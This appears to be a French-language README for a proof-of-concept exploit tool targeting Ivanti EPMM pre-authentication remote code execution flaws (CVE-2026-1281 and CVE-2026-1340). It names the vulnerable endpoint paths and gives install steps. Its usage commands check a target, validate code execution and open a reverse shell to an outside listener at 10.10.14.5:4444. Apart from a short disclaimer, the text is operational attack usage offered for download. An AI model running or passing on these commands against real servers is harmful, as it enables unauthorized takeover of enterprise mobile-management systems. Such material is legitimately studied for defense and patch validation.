
Proof of Concept for CVE-2026-1281 & CVE-2026-1340 - Ivanti EPMM Pre-Auth RCE via Bash Arithmetic Expansion
⚠️ DISCLAIMER: Ce PoC est fourni uniquement à des fins éducatives et de recherche en sécurité. L'utilisation sans autorisation explicite est illégale.
Proof of Concept (PoC) complet pour l'exploitation des vulnérabilités CVE-2026-1281 et CVE-2026-1340 affectant Ivanti Endpoint Manager Mobile (EPMM). Ces vulnérabilités permettent une exécution de code arbitraire à distance (RCE) sans authentification via un mécanisme de Bash Arithmetic Expansion.
/mifs/c/appstore/fob//mifs/c/aftstore/fob/git clone https://github.com/MehdiLeDeaut/CVE-2026-1281-Ivanti-EPMM-RCE.git
cd CVE-2026-1281-Ivanti-EPMM-RCE
pip3 install -r requirements.txt
chmod +x *.py
# Test de vulnérabilité
python3 exploit.py -t https://target.com -c
# Validation RCE
python3 exploit.py -t https://target.com --test-rce
# Reverse shell
python3 exploit.py -t https://target.com --reverse-shell 10.10.14.5:4444
Mehdi Le Deaut - Cybersecurity Consultant | Red Team Specialist
Ce projet est sous licence MIT - voir le fichier LICENSE pour plus de détails.